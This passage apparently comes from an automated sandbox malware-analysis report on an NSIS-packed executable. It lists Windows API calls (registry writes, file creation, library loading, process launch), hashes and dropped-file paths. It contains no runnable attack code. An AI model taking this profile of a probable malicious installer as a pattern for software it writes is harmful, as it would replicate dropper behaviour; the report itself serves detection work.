                                                              • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                              • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

                                                              Control-flow Graph
                                                              • Function 004023DE-00402ACE, basic blocks 885-910, calling lstrlenW, RegSetValueExW and RegCloseKey and the subfunctions 00402C37, 00402CC7, 00402C15 and 004030FA (graph image not reproduced; executed/not-executed marking not recoverable from text)
                                                              APIs
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj4634.tmp,00000023,00000011,00000002), ref: 00402429
                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj4634.tmp,00000000,00000011,00000002), ref: 00402469
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj4634.tmp,00000000,00000011,00000002), ref: 00402551
                                                              Similarity
                                                              • API ID: CloseValuelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsj4634.tmp
                                                              • API String ID: 2655323295-3631540343
                                                              • Opcode ID: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                              • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                              • Opcode Fuzzy Hash: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                              • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                              APIs
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                              Similarity
                                                              • API ID: Close$Enum
                                                              • String ID:
                                                              • API String ID: 464197530-0
                                                              • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                              • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                              • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                              • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                              APIs
                                                                • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,75923420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C0C
                                                                • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,00000000,000000F0), ref: 0040164D
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\pechay\transskribere\jon, xrefs: 00401640
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon
                                                              • API String ID: 1892508949-4074717334
                                                              • Opcode ID: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                              • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                              • Opcode Fuzzy Hash: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                              • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 00405289
                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                                • Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                              • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                              • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                              • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                              • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061A1
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: Call
                                                              • API String ID: 3356406503-1824292864
                                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                              • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                              • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                              • CloseHandle.KERNEL32(?), ref: 0040589D
                                                              Strings
                                                              • Error launching installer, xrefs: 0040587A
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID: Error launching installer
                                                              • API String ID: 3712363035-66219284
                                                              • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                              • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                              • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                              • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,759223A0), ref: 00405341
                                                                • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 334405425-0
                                                              • Opcode ID: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                              • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                              • Opcode Fuzzy Hash: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                              • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                              APIs
                                                              • GlobalFree.KERNEL32(005CA2E0), ref: 00401BE1
                                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree
                                                              • String ID: Call
                                                              • API String ID: 3394109436-1824292864
                                                              • Opcode ID: 84467de0dce396edb77585f845136cbcf2c5fb7762c5f8c3cd98e46705f302be
                                                              • Instruction ID: 92ace51ac37ea5806125e07fe733601b5cdc010b72bea360b2f02f73c4ad7c89
                                                              • Opcode Fuzzy Hash: 84467de0dce396edb77585f845136cbcf2c5fb7762c5f8c3cd98e46705f302be
                                                              • Instruction Fuzzy Hash: 4921C072A01100DFDB20EB94CE8495A76A9AF44318725013BF902F72D1DA78A9519B5D
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000), ref: 1000295B
                                                              • GetLastError.KERNEL32 ref: 10002A62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                              • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                              • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                              • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj4634.tmp,00000000,00000011,00000002), ref: 00402551
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID:
                                                              • API String ID: 3356406503-0
                                                              • Opcode ID: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                              • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                              • Opcode Fuzzy Hash: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                              • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                              APIs
                                                                • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,75923420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C0C
                                                                • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                              • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,?,?,75923420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405CB4
                                                              • GetFileAttributesW.KERNELBASE(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,75923420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 00405CC4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID:
                                                              • API String ID: 3248276644-0
                                                              • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                              • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                              • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                              • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                              • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                              • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                              • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                              APIs
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteValue
                                                              • String ID:
                                                              • API String ID: 2831762973-0
                                                              • Opcode ID: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                              • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                              • Opcode Fuzzy Hash: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                              • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                              APIs
                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Window$EnableShow
                                                              • String ID:
                                                              • API String ID: 1136574915-0
                                                              • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                              • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                              • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                              • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                                • Part of subcall function 004065EC: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                              • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                              • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                              • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                              • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                              • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                              • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                              • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                              • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                              • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FilePointerwsprintf
                                                              • String ID:
                                                              • API String ID: 327478801-0
                                                              • Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                              • Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
                                                              • Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                              • Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D
                                                              APIs
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID:
                                                              • API String ID: 390214022-0
                                                              • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                              • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                              • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                              • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                              APIs
                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                              • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                              • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                              APIs
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                              • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
